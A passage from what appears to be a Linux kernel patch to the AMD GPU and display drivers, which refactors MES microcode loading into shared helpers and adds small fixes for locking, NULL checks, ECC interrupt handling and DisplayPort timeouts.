+-	edac_device_free_ctl_info(edev_ctl);
++irq_done:
++	rc = edac_device_add_device(edev_ctl);
++	if (rc) {
++		edac_device_free_ctl_info(edev_ctl);
++		return rc;
++	}
++
++	platform_set_drvdata(pdev, edev_ctl);
+ 
+ 	return rc;
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+index 7af3041ccd0e8..40e8da85f04fe 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+@@ -1274,7 +1274,7 @@ static int amdgpu_cs_submit(struct amdgpu_cs_parser *p,
+ 		r = drm_sched_job_add_dependency(&leader->base, fence);
+ 		if (r) {
+ 			dma_fence_put(fence);
+-			goto error_cleanup;
++			return r;
+ 		}
+ 	}
+ 
+@@ -1301,7 +1301,8 @@ static int amdgpu_cs_submit(struct amdgpu_cs_parser *p,
+ 	}
+ 	if (r) {
+ 		r = -EAGAIN;
+-		goto error_unlock;
++		mutex_unlock(&p->adev->notifier_lock);
++		return r;
+ 	}
+ 
+ 	p->fence = dma_fence_get(&leader->base.s_fence->finished);
+@@ -1348,14 +1349,6 @@ static int amdgpu_cs_submit(struct amdgpu_cs_parser *p,
+ 	mutex_unlock(&p->adev->notifier_lock);
+ 	mutex_unlock(&p->bo_list->bo_list_mutex);
+ 	return 0;
+-
+-error_unlock:
+-	mutex_unlock(&p->adev->notifier_lock);
+-
+-error_cleanup:
+-	for (i = 0; i < p->gang_size; ++i)
+-		drm_sched_job_cleanup(&p->jobs[i]->base);
+-	return r;
+ }
+ 
+ /* Cleanup the parser structure */
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 533263d442657..8a14202f86134 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -4503,7 +4503,11 @@ static int amdgpu_device_recover_vram(struct amdgpu_device *adev)
+ 	dev_info(adev->dev, "recover vram bo from shadow start\n");
+ 	mutex_lock(&adev->shadow_list_lock);
+ 	list_for_each_entry(vmbo, &adev->shadow_list, shadow_list) {
+-		shadow = &vmbo->bo;
++		/* If vm is compute context or adev is APU, shadow will be NULL */
++		if (!vmbo->shadow)
++			continue;
++		shadow = vmbo->shadow;
++
+ 		/* No need to recover an evicted BO */
+ 		if (shadow->tbo.resource->mem_type != TTM_PL_TT ||
+ 		    shadow->tbo.resource->start == AMDGPU_BO_INVALID_OFFSET ||
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+index 0c546245793b9..82e27bd4f0383 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+@@ -21,6 +21,8 @@
+  *
+  */
+ 
++#include <linux/firmware.h>
++
+ #include "amdgpu_mes.h"
+ #include "amdgpu.h"
+ #include "soc15_common.h"
+@@ -1423,3 +1425,60 @@ error_pasid:
+ 	kfree(vm);
+ 	return 0;
+ }
++
++int amdgpu_mes_init_microcode(struct amdgpu_device *adev, int pipe)
++{
++	const struct mes_firmware_header_v1_0 *mes_hdr;
++	struct amdgpu_firmware_info *info;
++	char ucode_prefix[30];
++	char fw_name[40];
++	int r;
++
++	amdgpu_ucode_ip_version_decode(adev, GC_HWIP, ucode_prefix, sizeof(ucode_prefix));
++	snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes%s.bin",
++		ucode_prefix,
++		pipe == AMDGPU_MES_SCHED_PIPE ? "" : "1");
++	r = amdgpu_ucode_request(adev, &adev->mes.fw[pipe], fw_name);
++	if (r)
++		goto out;
++
++	mes_hdr = (const struct mes_firmware_header_v1_0 *)
++		adev->mes.fw[pipe]->data;
++	adev->mes.uc_start_addr[pipe] =
++		le32_to_cpu(mes_hdr->mes_uc_start_addr_lo) |
++		((uint64_t)(le32_to_cpu(mes_hdr->mes_uc_start_addr_hi)) << 32);
++	adev->mes.data_start_addr[pipe] =
++		le32_to_cpu(mes_hdr->mes_data_start_addr_lo) |
++		((uint64_t)(le32_to_cpu(mes_hdr->mes_data_start_addr_hi)) << 32);
++
++	if (adev->firmware.load_type == AMDGPU_FW_LOAD_PSP) {
++		int ucode, ucode_data;
++
++		if (pipe == AMDGPU_MES_SCHED_PIPE) {
++			ucode = AMDGPU_UCODE_ID_CP_MES;
++			ucode_data = AMDGPU_UCODE_ID_CP_MES_DATA;
++		} else {
++			ucode = AMDGPU_UCODE_ID_CP_MES1;
++			ucode_data = AMDGPU_UCODE_ID_CP_MES1_DATA;
++		}
++
++		info = &adev->firmware.ucode[ucode];
++		info->ucode_id = ucode;
++		info->fw = adev->mes.fw[pipe];
++		adev->firmware.fw_size +=
++			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_size_bytes),
++			      PAGE_SIZE);
++
++		info = &adev->firmware.ucode[ucode_data];
++		info->ucode_id = ucode_data;
++		info->fw = adev->mes.fw[pipe];
++		adev->firmware.fw_size +=
++			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_data_size_bytes),
++			      PAGE_SIZE);
++	}
++
++	return 0;
++out:
++	amdgpu_ucode_release(&adev->mes.fw[pipe]);
++	return r;
++}
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.h
+index 97c05d08a551a..547ec35691fac 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.h
+@@ -306,6 +306,7 @@ struct amdgpu_mes_funcs {
+ 
+ int amdgpu_mes_ctx_get_offs(struct amdgpu_ring *ring, unsigned int id_offs);
+ 
++int amdgpu_mes_init_microcode(struct amdgpu_device *adev, int pipe);
+ int amdgpu_mes_init(struct amdgpu_device *adev);
+ void amdgpu_mes_fini(struct amdgpu_device *adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_sched.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_sched.c
+index e9b45089a28a6..863b2a34b2d64 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_sched.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_sched.c
+@@ -38,6 +38,7 @@ static int amdgpu_sched_process_priority_override(struct amdgpu_device *adev,
+ {
+ 	struct fd f = fdget(fd);
+ 	struct amdgpu_fpriv *fpriv;
++	struct amdgpu_ctx_mgr *mgr;
+ 	struct amdgpu_ctx *ctx;
+ 	uint32_t id;
+ 	int r;
+@@ -51,8 +52,11 @@ static int amdgpu_sched_process_priority_override(struct amdgpu_device *adev,
+ 		return r;
+ 	}
+ 
+-	idr_for_each_entry(&fpriv->ctx_mgr.ctx_handles, ctx, id)
++	mgr = &fpriv->ctx_mgr;
++	mutex_lock(&mgr->lock);
++	idr_for_each_entry(&mgr->ctx_handles, ctx, id)
+ 		amdgpu_ctx_priority_override(ctx, priority);
++	mutex_unlock(&mgr->lock);
+ 
+ 	fdput(f);
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
+index 5cb62e6249c23..6e7058a2d1c82 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
+@@ -1091,3 +1091,39 @@ void amdgpu_ucode_ip_version_decode(struct amdgpu_device *adev, int block_type,
+ 
+ 	snprintf(ucode_prefix, len, "%s_%d_%d_%d", ip_name, maj, min, rev);
+ }
++
++/*
++ * amdgpu_ucode_request - Fetch and validate amdgpu microcode
++ *
++ * @adev: amdgpu device
++ * @fw: pointer to load firmware to
++ * @fw_name: firmware to load
++ *
++ * This is a helper that will use request_firmware and amdgpu_ucode_validate
++ * to load and run basic validation on firmware. If the load fails, remap
++ * the error code to -ENODEV, so that early_init functions will fail to load.
++ */
++int amdgpu_ucode_request(struct amdgpu_device *adev, const struct firmware **fw,
++			 const char *fw_name)
++{
++	int err = request_firmware(fw, fw_name, adev->dev);
++
++	if (err)
++		return -ENODEV;
++	err = amdgpu_ucode_validate(*fw);
++	if (err)
++		dev_dbg(adev->dev, "\"%s\" failed to validate\n", fw_name);
++
++	return err;
++}
++
++/*
++ * amdgpu_ucode_release - Release firmware microcode
++ *
++ * @fw: pointer to firmware to release
++ */
++void amdgpu_ucode_release(const struct firmware **fw)
++{
++	release_firmware(*fw);
++	*fw = NULL;
++}
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.h
+index 552e06929229c..848579d4988bc 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.h
+@@ -544,6 +544,9 @@ void amdgpu_ucode_print_sdma_hdr(const struct common_firmware_header *hdr);
+ void amdgpu_ucode_print_psp_hdr(const struct common_firmware_header *hdr);
+ void amdgpu_ucode_print_gpu_info_hdr(const struct common_firmware_header *hdr);
+ int amdgpu_ucode_validate(const struct firmware *fw);
++int amdgpu_ucode_request(struct amdgpu_device *adev, const struct firmware **fw,
++			 const char *fw_name);
++void amdgpu_ucode_release(const struct firmware **fw);
+ bool amdgpu_ucode_hdr_version(union amdgpu_firmware_header *hdr,
+ 				uint16_t hdr_major, uint16_t hdr_minor);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+index 5dde6f82a1ca0..849a2cb191b4e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+@@ -3845,7 +3845,8 @@ static int gfx_v9_0_hw_fini(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+ 
+-	amdgpu_irq_put(adev, &adev->gfx.cp_ecc_error_irq, 0);
++	if (amdgpu_ras_is_supported(adev, AMDGPU_RAS_BLOCK__GFX))
++		amdgpu_irq_put(adev, &adev->gfx.cp_ecc_error_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gfx.priv_reg_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gfx.priv_inst_irq, 0);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
+index 21e46817d82d9..d8cb92a8cef85 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
+@@ -1145,7 +1145,6 @@ static int gmc_v10_0_hw_fini(void *handle)
+ 		return 0;
+ 	}
+ 
+-	amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+index 4326078689cd6..9760d7becde27 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+@@ -941,7 +941,6 @@ static int gmc_v11_0_hw_fini(void *handle)
+ 		return 0;
+ 	}
+ 
+-	amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
+ 	gmc_v11_0_gart_disable(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
+index 08d6cf79fb15d..c9948f78b2ba9 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
+@@ -1963,7 +1963,6 @@ static int gmc_v9_0_hw_fini(void *handle)
+ 	if (adev->mmhub.funcs->update_power_gating)
+ 		adev->mmhub.funcs->update_power_gating(adev, false);
+ 
+-	amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/jpeg_v3_0.c b/drivers/gpu/drm/amd/amdgpu/jpeg_v3_0.c
+index a1b751d9ac064..323d68b2124fa 100644
+--- a/drivers/gpu/drm/amd/amdgpu/jpeg_v3_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/jpeg_v3_0.c
+@@ -54,6 +54,7 @@ static int jpeg_v3_0_early_init(void *handle)
+ 
+ 	switch (adev->ip_versions[UVD_HWIP][0]) {
+ 	case IP_VERSION(3, 1, 1):
++	case IP_VERSION(3, 1, 2):
+ 		break;
+ 	default:
+ 		harvest = RREG32_SOC15(JPEG, 0, mmCC_UVD_HARVESTING);
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v10_1.c b/drivers/gpu/drm/amd/amdgpu/mes_v10_1.c
+index 614394118a53e..7848b9de79ce9 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mes_v10_1.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v10_1.c
+@@ -379,89 +379,6 @@ static const struct amdgpu_mes_funcs mes_v10_1_funcs = {
+ 	.resume_gang = mes_v10_1_resume_gang,
+ };
+ 
+-static int mes_v10_1_init_microcode(struct amdgpu_device *adev,
+-				    enum admgpu_mes_pipe pipe)
+-{
+-	const char *chip_name;
+-	char fw_name[30];
+-	int err;
+-	const struct mes_firmware_header_v1_0 *mes_hdr;
+-	struct amdgpu_firmware_info *info;
+-
+-	switch (adev->ip_versions[GC_HWIP][0]) {
+-	case IP_VERSION(10, 1, 10):
+-		chip_name = "navi10";
+-		break;
+-	case IP_VERSION(10, 3, 0):
+-		chip_name = "sienna_cichlid";
+-		break;
+-	default:
+-		BUG();
+-	}
+-
+-	if (pipe == AMDGPU_MES_SCHED_PIPE)
+-		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes.bin",
+-			 chip_name);
+-	else
+-		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes1.bin",
+-			 chip_name);
+-
+-	err = request_firmware(&adev->mes.fw[pipe], fw_name, adev->dev);
+-	if (err)
+-		return err;
+-
+-	err = amdgpu_ucode_validate(adev->mes.fw[pipe]);
+-	if (err) {
+-		release_firmware(adev->mes.fw[pipe]);
+-		adev->mes.fw[pipe] = NULL;
+-		return err;
+-	}
+-
+-	mes_hdr = (const struct mes_firmware_header_v1_0 *)
+-		adev->mes.fw[pipe]->data;
+-	adev->mes.uc_start_addr[pipe] =
+-		le32_to_cpu(mes_hdr->mes_uc_start_addr_lo) |
+-		((uint64_t)(le32_to_cpu(mes_hdr->mes_uc_start_addr_hi)) << 32);
+-	adev->mes.data_start_addr[pipe] =
+-		le32_to_cpu(mes_hdr->mes_data_start_addr_lo) |
+-		((uint64_t)(le32_to_cpu(mes_hdr->mes_data_start_addr_hi)) << 32);
+-
+-	if (adev->firmware.load_type == AMDGPU_FW_LOAD_PSP) {
+-		int ucode, ucode_data;
+-
+-		if (pipe == AMDGPU_MES_SCHED_PIPE) {
+-			ucode = AMDGPU_UCODE_ID_CP_MES;
+-			ucode_data = AMDGPU_UCODE_ID_CP_MES_DATA;
+-		} else {
+-			ucode = AMDGPU_UCODE_ID_CP_MES1;
+-			ucode_data = AMDGPU_UCODE_ID_CP_MES1_DATA;
+-		}
+-
+-		info = &adev->firmware.ucode[ucode];
+-		info->ucode_id = ucode;
+-		info->fw = adev->mes.fw[pipe];
+-		adev->firmware.fw_size +=
+-			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_size_bytes),
+-			      PAGE_SIZE);
+-
+-		info = &adev->firmware.ucode[ucode_data];
+-		info->ucode_id = ucode_data;
+-		info->fw = adev->mes.fw[pipe];
+-		adev->firmware.fw_size +=
+-			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_data_size_bytes),
+-			      PAGE_SIZE);
+-	}
+-
+-	return 0;
+-}
+-
+-static void mes_v10_1_free_microcode(struct amdgpu_device *adev,
+-				     enum admgpu_mes_pipe pipe)
+-{
+-	release_firmware(adev->mes.fw[pipe]);
+-	adev->mes.fw[pipe] = NULL;
+-}
+-
+ static int mes_v10_1_allocate_ucode_buffer(struct amdgpu_device *adev,
+ 					   enum admgpu_mes_pipe pipe)
+ {
+@@ -1019,10 +936,6 @@ static int mes_v10_1_sw_init(void *handle)
+ 		if (!adev->enable_mes_kiq && pipe == AMDGPU_MES_KIQ_PIPE)
+ 			continue;
+ 
+-		r = mes_v10_1_init_microcode(adev, pipe);
+-		if (r)
+-			return r;
+-
+ 		r = mes_v10_1_allocate_eop_buf(adev, pipe);
+ 		if (r)
+ 			return r;
+@@ -1059,8 +972,7 @@ static int mes_v10_1_sw_fini(void *handle)
+ 		amdgpu_bo_free_kernel(&adev->mes.eop_gpu_obj[pipe],
+ 				      &adev->mes.eop_gpu_addr[pipe],
+ 				      NULL);
+-
+-		mes_v10_1_free_microcode(adev, pipe);
++		amdgpu_ucode_release(&adev->mes.fw[pipe]);
+ 	}
+ 
+ 	amdgpu_bo_free_kernel(&adev->gfx.kiq.ring.mqd_obj,
+@@ -1229,6 +1141,22 @@ static int mes_v10_1_resume(void *handle)
+ 	return amdgpu_mes_resume(adev);
+ }
+ 
++static int mes_v10_0_early_init(void *handle)
++{
++	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
++	int pipe, r;
++
++	for (pipe = 0; pipe < AMDGPU_MAX_MES_PIPES; pipe++) {
++		if (!adev->enable_mes_kiq && pipe == AMDGPU_MES_KIQ_PIPE)
++			continue;
++		r = amdgpu_mes_init_microcode(adev, pipe);
++		if (r)
++			return r;
++	}
++
++	return 0;
++}
++
+ static int mes_v10_0_late_init(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+@@ -1241,6 +1169,7 @@ static int mes_v10_0_late_init(void *handle)
+ 
+ static const struct amd_ip_funcs mes_v10_1_ip_funcs = {
+ 	.name = "mes_v10_1",
++	.early_init = mes_v10_0_early_init,
+ 	.late_init = mes_v10_0_late_init,
+ 	.sw_init = mes_v10_1_sw_init,
+ 	.sw_fini = mes_v10_1_sw_fini,
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+index 1c4787000a5f3..03844a82462fe 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+@@ -460,80 +460,6 @@ static const struct amdgpu_mes_funcs mes_v11_0_funcs = {
+ 	.misc_op = mes_v11_0_misc_op,
+ };
+ 
+-static int mes_v11_0_init_microcode(struct amdgpu_device *adev,
+-				    enum admgpu_mes_pipe pipe)
+-{
+-	char fw_name[30];
+-	char ucode_prefix[30];
+-	int err;
+-	const struct mes_firmware_header_v1_0 *mes_hdr;
+-	struct amdgpu_firmware_info *info;
+-
+-	amdgpu_ucode_ip_version_decode(adev, GC_HWIP, ucode_prefix, sizeof(ucode_prefix));
+-
+-	if (pipe == AMDGPU_MES_SCHED_PIPE)
+-		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes.bin",
+-			 ucode_prefix);
+-	else
+-		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes1.bin",
+-			 ucode_prefix);
+-
+-	err = request_firmware(&adev->mes.fw[pipe], fw_name, adev->dev);
+-	if (err)
+-		return err;
+-
+-	err = amdgpu_ucode_validate(adev->mes.fw[pipe]);
+-	if (err) {
+-		release_firmware(adev->mes.fw[pipe]);
+-		adev->mes.fw[pipe] = NULL;
+-		return err;
+-	}
+-
+-	mes_hdr = (const struct mes_firmware_header_v1_0 *)
+-		adev->mes.fw[pipe]->data;
+-	adev->mes.uc_start_addr[pipe] =
+-		le32_to_cpu(mes_hdr->mes_uc_start_addr_lo) |
+-		((uint64_t)(le32_to_cpu(mes_hdr->mes_uc_start_addr_hi)) << 32);
+-	adev->mes.data_start_addr[pipe] =
+-		le32_to_cpu(mes_hdr->mes_data_start_addr_lo) |
+-		((uint64_t)(le32_to_cpu(mes_hdr->mes_data_start_addr_hi)) << 32);
+-
+-	if (adev->firmware.load_type == AMDGPU_FW_LOAD_PSP) {
+-		int ucode, ucode_data;
+-
+-		if (pipe == AMDGPU_MES_SCHED_PIPE) {
+-			ucode = AMDGPU_UCODE_ID_CP_MES;
+-			ucode_data = AMDGPU_UCODE_ID_CP_MES_DATA;
+-		} else {
+-			ucode = AMDGPU_UCODE_ID_CP_MES1;
+-			ucode_data = AMDGPU_UCODE_ID_CP_MES1_DATA;
+-		}
+-
+-		info = &adev->firmware.ucode[ucode];
+-		info->ucode_id = ucode;
+-		info->fw = adev->mes.fw[pipe];
+-		adev->firmware.fw_size +=
+-			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_size_bytes),
+-			      PAGE_SIZE);
+-
+-		info = &adev->firmware.ucode[ucode_data];
+-		info->ucode_id = ucode_data;
+-		info->fw = adev->mes.fw[pipe];
+-		adev->firmware.fw_size +=
+-			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_data_size_bytes),
+-			      PAGE_SIZE);
+-	}
+-
+-	return 0;
+-}
+-
+-static void mes_v11_0_free_microcode(struct amdgpu_device *adev,
+-				     enum admgpu_mes_pipe pipe)
+-{
+-	release_firmware(adev->mes.fw[pipe]);
+-	adev->mes.fw[pipe] = NULL;
+-}
+-
+ static int mes_v11_0_allocate_ucode_buffer(struct amdgpu_device *adev,
+ 					   enum admgpu_mes_pipe pipe)
+ {
+@@ -1101,10 +1027,6 @@ static int mes_v11_0_sw_init(void *handle)
+ 		if (!adev->enable_mes_kiq && pipe == AMDGPU_MES_KIQ_PIPE)
+ 			continue;
+ 
+-		r = mes_v11_0_init_microcode(adev, pipe);
+-		if (r)
+-			return r;
+-
+ 		r = mes_v11_0_allocate_eop_buf(adev, pipe);
+ 		if (r)
+ 			return r;
+@@ -1141,8 +1063,7 @@ static int mes_v11_0_sw_fini(void *handle)
+ 		amdgpu_bo_free_kernel(&adev->mes.eop_gpu_obj[pipe],
+ 				      &adev->mes.eop_gpu_addr[pipe],
+ 				      NULL);
+-
+-		mes_v11_0_free_microcode(adev, pipe);
++		amdgpu_ucode_release(&adev->mes.fw[pipe]);
+ 	}
+ 
+ 	amdgpu_bo_free_kernel(&adev->gfx.kiq.ring.mqd_obj,
+@@ -1339,6 +1260,22 @@ static int mes_v11_0_resume(void *handle)
+ 	return amdgpu_mes_resume(adev);
+ }
+ 
++static int mes_v11_0_early_init(void *handle)
++{
++	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
++	int pipe, r;
++
++	for (pipe = 0; pipe < AMDGPU_MAX_MES_PIPES; pipe++) {
++		if (!adev->enable_mes_kiq && pipe == AMDGPU_MES_KIQ_PIPE)
++			continue;
++		r = amdgpu_mes_init_microcode(adev, pipe);
++		if (r)
++			return r;
++	}
++
++	return 0;
++}
++
+ static int mes_v11_0_late_init(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+@@ -1353,6 +1290,7 @@ static int mes_v11_0_late_init(void *handle)
+ 
+ static const struct amd_ip_funcs mes_v11_0_ip_funcs = {
+ 	.name = "mes_v11_0",
++	.early_init = mes_v11_0_early_init,
+ 	.late_init = mes_v11_0_late_init,
+ 	.sw_init = mes_v11_0_sw_init,
+ 	.sw_fini = mes_v11_0_sw_fini,
+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+index 4d780e4430e78..77d5a6f304094 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+@@ -1941,9 +1941,11 @@ static int sdma_v4_0_hw_fini(void *handle)
+ 		return 0;
+ 	}
+ 
+-	for (i = 0; i < adev->sdma.num_instances; i++) {
+-		amdgpu_irq_put(adev, &adev->sdma.ecc_irq,
+-			       AMDGPU_SDMA_IRQ_INSTANCE0 + i);
++	if (amdgpu_ras_is_supported(adev, AMDGPU_RAS_BLOCK__SDMA)) {
++		for (i = 0; i < adev->sdma.num_instances; i++) {
++			amdgpu_irq_put(adev, &adev->sdma.ecc_irq,
++				       AMDGPU_SDMA_IRQ_INSTANCE0 + i);
++		}
+ 	}
+ 
+ 	sdma_v4_0_ctx_switch_enable(adev, false);
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 9eedc1a1494c0..4bf9d8cc8132b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -777,7 +777,7 @@ static int soc21_common_early_init(void *handle)
+ 			AMD_PG_SUPPORT_VCN_DPG |
+ 			AMD_PG_SUPPORT_GFX_PG |
+ 			AMD_PG_SUPPORT_JPEG;
+-		adev->external_rev_id = adev->rev_id + 0x1;
++		adev->external_rev_id = adev->rev_id + 0x80;
+ 		break;
+ 
+ 	default:
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 422909d1f352b..abac86514328d 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -39,6 +39,7 @@
+ #include "dc/dc_edid_parser.h"
+ #include "dc/dc_stat.h"
+ #include "amdgpu_dm_trace.h"
++#include "dc/inc/dc_link_ddc.h"
+ 
+ #include "vid.h"
+ #include "amdgpu.h"
+@@ -2262,6 +2263,14 @@ static void s3_handle_mst(struct drm_device *dev, bool suspend)
+ 		if (suspend) {
+ 			drm_dp_mst_topology_mgr_suspend(mgr);
+ 		} else {
++			/* if extended timeout is supported in hardware,
++			 * default to LTTPR timeout (3.2ms) first as a W/A for DP link layer
++			 * CTS 4.2.1.1 regression introduced by CTS specs requirement update.
++			 */
++			dc_link_aux_try_to_configure_timeout(aconnector->dc_link->ddc, LINK_AUX_DEFAULT_LTTPR_TIMEOUT_PERIOD);
++			if (!dp_is_lttpr_present(aconnector->dc_link))
++				dc_link_aux_try_to_configure_timeout(aconnector->dc_link->ddc, LINK_AUX_DEFAULT_TIMEOUT_PERIOD);
++
+ 			ret = drm_dp_mst_topology_mgr_resume(mgr, true);
+ 			if (ret < 0) {
+ 				dm_helpers_dp_mst_stop_top_mgr(aconnector->dc_link->ctx,
+@@ -7694,6 +7703,13 @@ static void amdgpu_dm_commit_cursors(struct drm_atomic_state *state)
+ 			handle_cursor_update(plane, old_plane_state);
+ }
+ 
++static inline uint32_t get_mem_type(struct drm_framebuffer *fb)
++{
++	struct amdgpu_bo *abo = gem_to_amdgpu_bo(fb->obj[0]);
++
++	return abo->tbo.resource ? abo->tbo.resource->mem_type : 0;
++}
++
+ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 				    struct dc_state *dc_state,
+ 				    struct drm_device *dev,
+@@ -7767,6 +7783,8 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 			continue;
+ 
+ 		dc_plane = dm_new_plane_state->dc_state;
++		if (!dc_plane)
++			continue;
+ 
+ 		bundle->surface_updates[planes_count].surface = dc_plane;
+ 		if (new_pcrtc_state->color_mgmt_changed) {
+@@ -7811,11 +7829,13 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 
+ 		/*
+ 		 * Only allow immediate flips for fast updates that don't
+-		 * change FB pitch, DCC state, rotation or mirroing.
++		 * change memory domain, FB pitch, DCC state, rotation or
++		 * mirroring.
+ 		 */
+ 		bundle->flip_addrs[planes_count].flip_immediate =
+ 			crtc->state->async_flip &&
+-			acrtc_state->update_type == UPDATE_TYPE_FAST;
++			acrtc_state->update_type == UPDATE_TYPE_FAST &&
++			get_mem_type(old_plane_state->fb) == get_mem_type(fb);
+ 
+ 		timestamp_ns = ktime_get_ns();
+ 		bundle->flip_addrs[planes_count].flip_timestamp_in_us = div_u64(timestamp_ns, 1000);
+@@ -9312,8 +9332,9 @@ static int dm_update_plane_state(struct dc *dc,
+ 			return -EINVAL;
+ 		}
+ 
++		if (dm_old_plane_state->dc_state)
++			dc_plane_state_release(dm_old_plane_state->dc_state);
+ 
+-		dc_plane_state_release(dm_old_plane_state->dc_state);
+ 		dm_new_plane_state->dc_state = NULL;
+ 
+ 		*lock_and_validation_needed = true;
+@@ -9850,6 +9871,7 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 		ret = compute_mst_dsc_configs_for_state(state, dm_state->context, vars);
+ 		if (ret) {
+ 			DRM_DEBUG_DRIVER("compute_mst_dsc_configs_for_state() failed\n");
++			ret = -EINVAL;
+ 			goto fail;
+ 		}
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index 60dd88666437d..994a37003217d 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
